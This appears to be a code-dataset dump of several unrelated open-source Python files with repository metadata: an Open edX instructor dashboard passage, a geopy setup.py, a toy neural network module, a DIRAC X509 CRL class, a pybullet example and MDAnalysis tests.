message = Text(_("Enrollment data is now available in {dashboard_link}.")).format(dashboard_link=dashboard_link)
section_data['enrollment_message'] = message
if settings.FEATURES.get('ENABLE_SYSADMIN_DASHBOARD'):
section_data['detailed_gitlogs_url'] = reverse('gitlogs_detail', kwargs={'course_id': unicode(course_key)})
try:
sorted_cutoffs = sorted(course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True)
advance = lambda memo, (letter, score): "{}: {}, ".format(letter, score) + memo
section_data['grade_cutoffs'] = reduce(advance, sorted_cutoffs, "")[:-2]
except Exception: # pylint: disable=broad-except
section_data['grade_cutoffs'] = "Not Available"
try:
section_data['course_errors'] = [(escape(a), '') for (a, _unused) in modulestore().get_course_errors(course.id)]
except Exception: # pylint: disable=broad-except
section_data['course_errors'] = [('Error fetching errors', '')]
return section_data
def _section_membership(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
ccx_enabled = settings.FEATURES.get('CUSTOM_COURSES_EDX', False) and course.enable_ccx
enrollment_role_choices = configuration_helpers.get_value('MANUAL_ENROLLMENT_ROLE_CHOICES',
settings.MANUAL_ENROLLMENT_ROLE_CHOICES)
section_data = {
'section_key': 'membership',
'section_display_name': _('Membership'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'enroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'unenroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'upload_student_csv_button_url': reverse('register_and_enroll_students', kwargs={'course_id': unicode(course_key)}),
'modify_beta_testers_button_url': reverse('bulk_beta_modify_access', kwargs={'course_id': unicode(course_key)}),
'list_course_role_members_url': reverse('list_course_role_members', kwargs={'course_id': unicode(course_key)}),
'modify_access_url': reverse('modify_access', kwargs={'course_id': unicode(course_key)}),
'list_forum_members_url': reverse('list_forum_members', kwargs={'course_id': unicode(course_key)}),
'update_forum_role_membership_url': reverse('update_forum_role_membership', kwargs={'course_id': unicode(course_key)}),
'enrollment_role_choices': enrollment_role_choices
}
return section_data
def _section_cohort_management(course, access):
""" Provide data for the corresponding cohort management section """
course_key = course.id
ccx_enabled = hasattr(course_key, 'ccx')
section_data = {
'section_key': 'cohort_management',
'section_display_name': _('Cohorts'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'course_cohort_settings_url': reverse(
'course_cohort_settings',
kwargs={'course_key_string': unicode(course_key)}
),
'cohorts_url': reverse('cohorts', kwargs={'course_key_string': unicode(course_key)}),
'upload_cohorts_csv_url': reverse('add_users_to_cohorts', kwargs={'course_id': unicode(course_key)}),
'verified_track_cohorting_url': reverse(
'verified_track_cohorting', kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _section_discussions_management(course, access):
""" Provide data for the corresponding discussion management section """
course_key = course.id
enrollment_track_schemes = available_division_schemes(course_key)
section_data = {
'section_key': 'discussions_management',
'section_display_name': _('Discussions'),
'is_hidden': (not is_course_cohorted(course_key) and
CourseDiscussionSettings.ENROLLMENT_TRACK not in enrollment_track_schemes),
'discussion_topics_url': reverse('discussion_topics', kwargs={'course_key_string': unicode(course_key)}),
'course_discussion_settings': reverse(
'course_discussions_settings',
kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _is_small_course(course_key):
""" Compares against MAX_ENROLLMENT_INSTR_BUTTONS to determine if course enrollment is considered small. """
is_small_course = False
enrollment_count = CourseEnrollment.objects.num_enrolled_in(course_key)
max_enrollment_for_buttons = settings.FEATURES.get("MAX_ENROLLMENT_INSTR_BUTTONS")
if max_enrollment_for_buttons is not None:
is_small_course = enrollment_count <= max_enrollment_for_buttons
return is_small_course
def _section_student_admin(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
is_small_course = _is_small_course(course_key)
section_data = {
'section_key': 'student_admin',
'section_display_name': _('Student Admin'),
'access': access,
'is_small_course': is_small_course,
'get_student_enrollment_status_url': reverse(
'get_student_enrollment_status',
kwargs={'course_id': unicode(course_key)}
),
'get_student_progress_url_url': reverse('get_student_progress_url', kwargs={'course_id': unicode(course_key)}),
'enrollment_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_url': reverse('reset_student_attempts', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_for_entrance_exam_url': reverse(
'reset_student_attempts_for_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'rescore_problem_url': reverse('rescore_problem', kwargs={'course_id': unicode(course_key)}),
'override_problem_score_url': reverse('override_problem_score', kwargs={'course_id': unicode(course_key)}),
'rescore_entrance_exam_url': reverse('rescore_entrance_exam', kwargs={'course_id': unicode(course_key)}),
'student_can_skip_entrance_exam_url': reverse(
'mark_student_can_skip_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_entrace_exam_instructor_tasks_url': reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': unicode(course_key)}),
'spoc_gradebook_url': reverse('spoc_gradebook', kwargs={'course_id': unicode(course_key)}),
}
if waffle_flags()[WRITABLE_GRADEBOOK].is_enabled(course_key) and settings.WRITABLE_GRADEBOOK_URL:
section_data['writable_gradebook_url'] = urljoin(settings.WRITABLE_GRADEBOOK_URL, '/' + text_type(course_key))
return section_data
def _section_extensions(course):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'extensions',
'section_display_name': _('Extensions'),
'units_with_due_dates': [(title_or_url(unit), unicode(unit.location))
for unit in get_units_with_due_date(course)],
'change_due_date_url': reverse('change_due_date', kwargs={'course_id': unicode(course.id)}),
'reset_due_date_url': reverse('reset_due_date', kwargs={'course_id': unicode(course.id)}),
'show_unit_extensions_url': reverse('show_unit_extensions', kwargs={'course_id': unicode(course.id)}),
'show_student_extensions_url': reverse('show_student_extensions', kwargs={'course_id': unicode(course.id)}),
}
return section_data
def _section_data_download(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
show_proctored_report_button = (
settings.FEATURES.get('ENABLE_SPECIAL_EXAMS', False) and
course.enable_proctored_exams
)
section_data = {
'section_key': 'data_download',
'section_display_name': _('Data Download'),
'access': access,
'show_generate_proctored_exam_report_button': show_proctored_report_button,
'get_problem_responses_url': reverse('get_problem_responses', kwargs={'course_id': unicode(course_key)}),
'get_grading_config_url': reverse('get_grading_config', kwargs={'course_id': unicode(course_key)}),
'get_students_features_url': reverse('get_students_features', kwargs={'course_id': unicode(course_key)}),
'get_issued_certificates_url': reverse(
'get_issued_certificates', kwargs={'course_id': unicode(course_key)}
),
'get_students_who_may_enroll_url': reverse(
'get_students_who_may_enroll', kwargs={'course_id': unicode(course_key)}
),
'get_anon_ids_url': reverse('get_anon_ids', kwargs={'course_id': unicode(course_key)}),
'list_proctored_results_url': reverse('get_proctored_exam_results', kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_report_downloads_url': reverse('list_report_downloads', kwargs={'course_id': unicode(course_key)}),
'calculate_grades_csv_url': reverse('calculate_grades_csv', kwargs={'course_id': unicode(course_key)}),
'problem_grade_report_url': reverse('problem_grade_report', kwargs={'course_id': unicode(course_key)}),
'course_has_survey': True if course.course_survey_name else False,
'course_survey_results_url': reverse('get_course_survey_results', kwargs={'course_id': unicode(course_key)}),
'export_ora2_data_url': reverse('export_ora2_data', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def null_applicable_aside_types(block): # pylint: disable=unused-argument
"""
get_aside method for monkey-patching into applicable_aside_types
while rendering an HtmlDescriptor for email text editing. This returns
an empty list.
"""
return []
def _section_send_email(course, access):
""" Provide data for the corresponding bulk email section """
course_key = course.id
# Monkey-patch applicable_aside_types to return no asides for the duration of this render
with patch.object(course.runtime, 'applicable_aside_types', null_applicable_aside_types):
# This HtmlDescriptor is only being used to generate a nice text editor.
html_module = HtmlDescriptor(
course.system,
DictFieldData({'data': ''}),
ScopeIds(None, None, None, course_key.make_usage_key('html', 'fake'))
)
fragment = course.system.render(html_module, 'studio_view')
fragment = wrap_xblock(
'LmsRuntime', html_module, 'studio_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
cohorts = []
if is_course_cohorted(course_key):
cohorts = get_course_cohorts(course)
course_modes = []
if not VerifiedTrackCohortedCourse.is_verified_track_cohort_enabled(course_key):
course_modes = CourseMode.modes_for_course(course_key, include_expired=True, only_selectable=False)
email_editor = fragment.content
section_data = {
'section_key': 'send_email',
'section_display_name': _('Email'),
'access': access,
'send_email': reverse('send_email', kwargs={'course_id': unicode(course_key)}),
'editor': email_editor,
'cohorts': cohorts,
'course_modes': course_modes,
'default_cohort_name': DEFAULT_COHORT_NAME,
'list_instructor_tasks_url': reverse(
'list_instructor_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_background_tasks_url': reverse(
'list_background_email_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_content_history_url': reverse(
'list_email_content', kwargs={'course_id': unicode(course_key)}
),
}
return section_data
def _get_dashboard_link(course_key):
""" Construct a URL to the external analytics dashboard """
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link = HTML(u"<a href=\"{0}\" target=\"_blank\">{1}</a>").format(
analytics_dashboard_url, settings.ANALYTICS_DASHBOARD_NAME
)
return link
def _section_analytics(course, access):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'instructor_analytics',
'section_display_name': _('Analytics'),
'access': access,
'course_id': unicode(course.id),
}
return section_data
def _section_metrics(course, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'metrics',
'section_display_name': _('Metrics'),
'access': access,
'course_id': unicode(course_key),
'sub_section_display_name': get_section_display_name(course_key),
'section_has_problem': get_array_section_has_problem(course_key),
'get_students_opened_subsection_url': reverse('get_students_opened_subsection'),
'get_students_problem_grades_url': reverse('get_students_problem_grades'),
'post_metrics_data_csv_url': reverse('post_metrics_data_csv'),
}
return section_data
def _section_open_response_assessment(request, course, openassessment_blocks, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
ora_items = []
parents = {}
for block in openassessment_blocks:
block_parent_id = unicode(block.parent)
result_item_id = unicode(block.location)
if block_parent_id not in parents:
parents[block_parent_id] = modulestore().get_item(block.parent)
ora_items.append({
'id': result_item_id,
'name': block.display_name,
'parent_id': block_parent_id,
'parent_name': parents[block_parent_id].display_name,
'staff_assessment': 'staff-assessment' in block.assessment_steps,
'url_base': reverse('xblock_view', args=[course.id, block.location, 'student_view']),
'url_grade_available_responses': reverse('xblock_view', args=[course.id, block.location,
'grade_available_responses_view']),
})
openassessment_block = openassessment_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(openassessment_block.location),
disable_staff_debug_info=True, course=course
)
section_data = {
'fragment': block.render('ora_blocks_listing_view', context={
'ora_items': ora_items,
'ora_item_view_enabled': settings.FEATURES.get('ENABLE_XBLOCK_VIEW_ENDPOINT', False)
}),
'section_key': 'open_response_assessment',
'section_display_name': _('Open Responses'),
'access': access,
'course_id': unicode(course_key),
}
return section_data
def is_ecommerce_course(course_key):
"""
Checks if the given course is an e-commerce course or not, by checking its SKU value from
CourseMode records for the course
"""
sku_count = len([mode.sku for mode in CourseMode.modes_for_course(course_key) if mode.sku])
return sku_count > 0
|
philanthropy-u/edx-platform
|
lms/djangoapps/instructor/views/instructor_dashboard.py
|
Python
|
agpl-3.0
| 36,922
|
[
"VisIt"
] |
ba5740853f52f8f4891c5f82cd739a5c5a6b5e5c67e1add671732895bb564cc8
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
from geopy import __version__, __name__, __author__
name = 'pivotal_' + __name__
base_url = 'https://github.com/pivotal-energy-solutions/geopy'
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name=name, # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__, # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='Python Geocoding Toolbox', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# Denotes that our long_description is in Markdown; valid values are
# text/plain, text/x-rst, and text/markdown
#
# Optional if long_description is written in reStructuredText (rst) but
# required for plain-text or Markdown; if unspecified, "applications should
# attempt to render [the long_description] as text/x-rst; charset=UTF-8 and
# fall back to text/plain if it is not valid rst" (see link below)
#
# This field corresponds to the "Description-Content-Type" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-content-type-optional
long_description_content_type='text/markdown', # Optional (see note above)
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url=base_url, # Optional
download_url='{0}/archive/{1}.tar.gz'.format(base_url, __version__),
# This should be your name or the name of the organization which owns the
# project.
author=__author__, # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='exogen@gmail.com', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
# Pick your license as you wish
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
"Topic :: Scientific/Engineering :: GIS",
"Topic :: Software Development :: Libraries :: Python Modules"
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='geocoding django', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
# install_requires=['peppercorn'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
#
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
project_urls={ # Optional
'Bug Reports': '{}/issues'.format(base_url),
'Say Thanks!': 'https://saythanks.io/to/rh0dium',
'Original Source': 'https://github.com/geopy/geopy',
},
)
|
pivotal-energy-solutions/geopy
|
setup.py
|
Python
|
mit
| 8,055
|
[
"VisIt"
] |
2da093a5ea6ca78c45f6a8622980d3fe58259cb2138b33058436ee8bb6fe2e3e
|
# This neural class creates the fundamentals of a
# neural network. All of the classes are to achieve
# standard, plain bread and butter goals of a
# standard backpropogation supervised learning
# network.
#
# It can work out of the box for basic stuff, but to extend it
# beyond just the plain standard, you can extend the classes
# in here by importing this module and extending neural.A_class.
#
# Best practice: put those extensions in package neural.ext.
# Array of neuron/node-value/gradient pairs
# [
# [
# 0: Neuron/Node object of concern
# 1: Value/Gradient
# ]
# ]
#
# Sorry, reason for this is because dictionaries
# do not support objects as keys.
import random
# Standard digital-output perceptron
# IN list of NeuronInputs
# OUT list of Nodes
class Neuron:
def __init__(self, inputs = list(), outputs = list()):
self.inputs = inputs
self.outputs = outputs
def output(self):
sum = 0
for input in self.inputs:
sum += input.weight * input.input.value
return self.activation(sum)
def updateOutput(self):
outputValue = self.output()
for output in self.outputs:
output.value = outputValue
def inputGradient(self, input):
neuroninput_gradient = self.activationGradient() # times 1
return {"next": neuroninput_gradient * input.weight,
"weight": neuroninput_gradient * input.input.value}
def inputGradients(self):
temp = list()
for input in self.inputs:
temp.append([input, self.inputGradient(input)])
return temp
# Input gradients
# "next": Gradient of external node that inputs to the neuron (for backpropogation)
# "weight": Gradient of weight of the neuron input (for changing the weight)
def updateInputGradients(self):
for input in self.inputGradients():
input[0].input.gradient = input[1]["next"]
input[0].weight_gradient = input[1]["weight"]
def activation(self, sum):
return 1 if sum >= 1 else 0
def activationGradient(self):
output = self.output
sum = 0
for output in self.outputs:
sum += output.gradient
return sum
# if output is 1 and sum > 0:
# return 0
# elif output is not 1 and sum > 0:
# return sum
# elif output is 0 and sum < 0:
# return 0
# elif output is not 0 and sum < 0:
# return sum
# else:
# return 0 # sum == 0
# Standard weighted perceptron input
# IN Node (External of owner neuron)
# Must only belong to one neuron
class NeuronInput:
def __init__(self, input = None, weight = 0, weight_gradient = 0):
self.input = input
self.weight = weight
self.weight_gradient = weight_gradient
# Standard "wire" with standard backpropogation learning gradient
# NEXT Neuron
# PREV Neuron
class Node:
def __init__(self, value = 0, gradient = 0, nextInput = None, prevOutput = None):
self.value = value
self.gradient = gradient
self.nextInput = nextInput
self.prevOutput = prevOutput
# Standard layered network with inputs, outputs and hidden layers
class Network:
def __init__(self, inputs = list(), outputs = list(), hiddens = list()):
self.inputs = inputs
self.outputs = outputs
self.hiddens = hiddens
def output(self):
temp = list()
for input in self.inputs:
temp.append(self.forward(input)) # To be optimized
return temp
# Returns output value of output neuron
def forward(self, neuron):
neuron.updateOutput()
for output in neuron.outputs:
if output.nextInput is not None: # Put no next input in node to stop forward propogation.
forward(output.nextInput)
else:
return [neuron, neuron.output()]
# Standard backpropogation teacher to evoke one specific output per output
# Do note that even if it can support multiple output nodes per output, if it
# is different, they will still be equal to one another.
class Teacher:
def __init__(self, network = None, step = 0.01):
self.network = network
self.step = step
def backward(self, neuron):
neuron.updateInputGradients()
for input in neuron.inputs:
input.weight += self.step * input.weight_gradient
if input.input.prevOutput is not None:
input.input.value += self.step * input.input.gradient
backward(input.input.prevOutput)
def teachStep(self, nodeGradients):
for nodeGradient in nodeGradients:
nodeGradient[0].gradient = nodeGradient[1]
if nodeGradient[0].prevOutput is not None:
self.backward(nodeGradient[0].prevOutput) # To be optimized
# Teaching lesson format
#
# [
# {
# "inputs"
# [
# [
# 0: Input node
# 1: Input value
# "outputs"
# [
# [
# 0: Output node
# 1: Desired output value
def teach(self, values, steps):
for i in range(1, steps):
value = random.choice(values)
for inputNode in value["inputs"]:
inputNode[0].value = inputNode[1]
self.network.output()
temp = list()
for outputNode in value["outputs"]:
temp.append([outputNode[0], 1 if outputNode[1] > outputNode[0].value else (-1 if outputNode[1] < outputNode[0].value else 0)])
self.teachStep(temp)
|
limdingwen/neural
|
neural.py
|
Python
|
mit
| 4,992
|
[
"NEURON"
] |
726e7d2035fa374d8cbdce9741da0a48e0e1b7a7d4432c0a28cc2f214fef7df2
|
""" X509CRL is a class for managing X509CRL
This class is used to manage the revoked certificates....
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import stat
import os
import tempfile
import re
import datetime
import M2Crypto
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Utilities import DErrno
# pylint: disable=broad-except
class X509CRL(object):
def __init__(self, cert=None):
self.__pemData = b""
if cert:
self.__loadedCert = True
self.__revokedCert = cert
else:
self.__loadedCert = False
@classmethod
def instanceFromFile(cls, crlLocation):
"""Instance a X509CRL from a file"""
crl = cls()
result = crl.loadCRLFromFile(crlLocation)
if not result["OK"]:
return result
return S_OK(crl)
def loadCRLFromFile(self, crlLocation):
"""
Load a x509CRL certificate from a pem file
Return : S_OK / S_ERROR
"""
self.__loadedCert = False
try:
self.__revokedCert = M2Crypto.X509.load_crl(crlLocation)
except Exception as e:
return S_ERROR(DErrno.ECERTREAD, "%s" % repr(e).replace(",)", ")"))
self.__loadedCert = True
with open(crlLocation, "rb") as crlFile:
pemData = crlFile.read()
self.__pemData = pemData
return S_OK()
def __bytes__(self):
if not self.__loadedCert:
return b"No certificate loaded"
return self.__pemData
def __str__(self):
return bytes(self).decode()
def dumpAllToString(self):
"""
Dump all to string
"""
if not self.__loadedCert:
return S_ERROR(DErrno.ECERTREAD, "No certificate loaded")
return S_OK(self.__pemData)
def dumpAllToFile(self, filename=False):
"""
Dump all to file. If no filename specified a temporal one will be created
"""
if not self.__loadedCert:
return S_ERROR("No certificate loaded")
try:
if not filename:
fd, filename = tempfile.mkstemp()
os.close(fd)
with open(filename, "wb") as fd:
fd.write(self.__pemData)
except Exception as e:
return S_ERROR(DErrno.EWF, "%s: %s" % (filename, repr(e).replace(",)", ")")))
try:
os.chmod(filename, stat.S_IRUSR | stat.S_IWUSR)
except Exception as e:
return S_ERROR(DErrno.ESPF, "%s: %s" % (filename, repr(e).replace(",)", ")")))
return S_OK(filename)
def hasExpired(self):
if not self.__loadedCert:
return S_ERROR("No certificate loaded")
# XXX It should be done better, for now M2Crypto doesn't offer access to fields like Next Update
txt = self.__revokedCert.as_text()
pattern = r"Next Update: (?P<nextUpdate>.*)\n"
dateStr = re.search(pattern.encode("utf-8"), txt).group("nextUpdate")
nextUpdate = datetime.datetime.strptime(dateStr, "%b %d %H:%M:%S %Y GMT")
return S_OK(datetime.datetime.now() > nextUpdate)
def getIssuer(self):
if not self.__loadedCert:
return S_ERROR("No certificate loaded")
# XXX It should be done better, for now M2Crypto doesn't offer access to fields like Issuer
txt = self.__revokedCert.as_text()
pattern = r"Issuer: (?P<issuer>.*)\n"
return S_OK(re.search(pattern.encode("utf-8"), txt).group("issuer"))
def __repr__(self):
repStr = "<X509CRL"
if self.__loadedCert:
repStr += "" # self.__revokedCert.get_issuer().one_line() # Why issuer?! XXX
repStr += ">"
return repStr
|
ic-hep/DIRAC
|
src/DIRAC/Core/Security/m2crypto/X509CRL.py
|
Python
|
gpl-3.0
| 3,804
|
[
"DIRAC"
] |
fd1e7367a9f1aa072d2a6a29f30f063e426b18633a2cd9d6be1ae5f715f3ee6f
|
import pybullet as p
from time import sleep
import pybullet_data
physicsClient = p.connect(p.GUI)
p.setAdditionalSearchPath(pybullet_data.getDataPath())
p.setGravity(0, 0, -10)
planeId = p.loadURDF("plane.urdf", [0,0,-2])
boxId = p.loadURDF("cube.urdf", [0,3,2],useMaximalCoordinates = True)
bunnyId = p.loadSoftBody("bunny.obj")#.obj")#.vtk")
#meshData = p.getMeshData(bunnyId)
#print("meshData=",meshData)
#p.loadURDF("cube_small.urdf", [1, 0, 1])
useRealTimeSimulation = 1
if (useRealTimeSimulation):
p.setRealTimeSimulation(1)
print(p.getDynamicsInfo(planeId, -1))
#print(p.getDynamicsInfo(bunnyId, 0))
print(p.getDynamicsInfo(boxId, -1))
p.changeDynamics(boxId,-1,mass=10)
while p.isConnected():
p.setGravity(0, 0, -10)
if (useRealTimeSimulation):
sleep(0.01) # Time in seconds.
#p.getCameraImage(320,200,renderer=p.ER_BULLET_HARDWARE_OPENGL )
else:
p.stepSimulation()
|
nrz/ylikuutio
|
external/bullet3/examples/pybullet/examples/load_soft_body.py
|
Python
|
agpl-3.0
| 902
|
[
"VTK"
] |
1d0eb975823a3ef5f4f0f50f73aea6b05db19e794abf64aa18de116c85cd224d
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
from __future__ import division, absolute_import
import numpy as np
from numpy.testing import (
assert_,
assert_almost_equal,
assert_array_equal,
assert_array_almost_equal,
assert_equal,
assert_raises,
)
from nose.plugins.attrib import attr
from MDAnalysisTests import make_Universe
from MDAnalysisTests.datafiles import (
COORDINATES_XYZ, COORDINATES_TRR,
GRO, TRR,
GRO_velocity, PDB_xvf, TRR_xvf
)
import MDAnalysis
from MDAnalysis import NoDataError
def assert_not_view(arr):
assert_(arr.flags['OWNDATA'] == True)
def assert_correct_errormessage(func, var):
errmsg = "Timestep does not contain {}".format(var)
try:
func[0](*func[1:])
except NoDataError as e:
assert_(errmsg in e.args[0])
else:
raise AssertionError
class TestAtomGroupTrajAccess(object):
"""
For AtomGroup and Atom access:
if present:
- check return type
- check dtype of array
- check not a view of original (should always be copy!)
- check the actual values returned
if not present in trajectory:
- check we get a NoDataError
- check the error message of NDE
For AtomGroup and Atom setting:
if present:
- check AtomGroup value is updated
- check value in master Timestep object is updated
if not present, check we get proper NoDataError on setting
"""
@staticmethod
def _check_atomgroup_positions_access(u, pos):
ag = u.atoms[10:20]
ag_pos = ag.positions
assert_(isinstance(ag_pos, np.ndarray))
assert_(ag_pos.dtype == np.float32)
assert_not_view(ag_pos)
assert_array_equal(ag_pos, u.trajectory.ts.positions[10:20])
@staticmethod
def _check_atomgroup_velocities_access(u, vel):
ag = u.atoms[10:20]
if vel:
ag_vel = ag.velocities
assert_(isinstance(ag_vel, np.ndarray))
assert_(ag_vel.dtype == np.float32)
assert_not_view(ag_vel)
assert_array_equal(ag_vel, u.trajectory.ts.velocities[10:20])
else:
assert_raises(NoDataError, getattr, ag, 'velocities')
assert_correct_errormessage((getattr, ag, 'velocities'), 'velocities')
@staticmethod
def _check_atomgroup_forces_access(u, force):
ag = u.atoms[10:20]
if force:
ag_for = ag.forces
assert_(isinstance(ag_for, np.ndarray))
assert_(ag_for.dtype == np.float32)
assert_not_view(ag_for)
assert_array_equal(ag_for, u.trajectory.ts.forces[10:20])
else:
assert_raises(NoDataError, getattr, ag, 'forces')
assert_correct_errormessage((getattr, ag, 'forces'), 'forces')
@staticmethod
def _check_atom_position_access(u, pos):
at = u.atoms[55]
at_pos = at.position
assert_(isinstance(at_pos, np.ndarray))
assert_(at_pos.dtype == np.float32)
assert_not_view(at_pos)
assert_array_equal(at_pos, u.trajectory.ts.positions[55])
@staticmethod
def _check_atom_velocity_access(u, vel):
at = u.atoms[55]
if vel:
at_vel = at.velocity
assert_(isinstance(at_vel, np.ndarray))
assert_(at_vel.dtype == np.float32)
assert_not_view(at_vel)
assert_array_equal(at_vel, u.trajectory.ts.velocities[55])
else:
assert_raises(NoDataError, getattr, at, 'velocity')
assert_correct_errormessage((getattr, at, 'velocity'), 'velocities')
@staticmethod
def _check_atom_force_access(u, force):
at = u.atoms[55]
if force:
at_for = at.force
assert_(isinstance(at_for, np.ndarray))
assert_(at_for.dtype == np.float32)
assert_not_view(at_for)
assert_array_equal(at_for, u.trajectory.ts.forces[55])
else:
assert_raises(NoDataError, getattr, at, 'force')
assert_correct_errormessage((getattr, at, 'force'), 'forces')
@staticmethod
def _check_atomgroup_positions_setting(u, pos):
ag = u.atoms[[101, 107, 109]]
new = np.array([[72.4, 64.5, 74.7],
[124.6, 15.6, -1.11],
[25.2, -66.6, 0]])
ag.positions = new
assert_array_almost_equal(ag.positions, new, decimal=5)
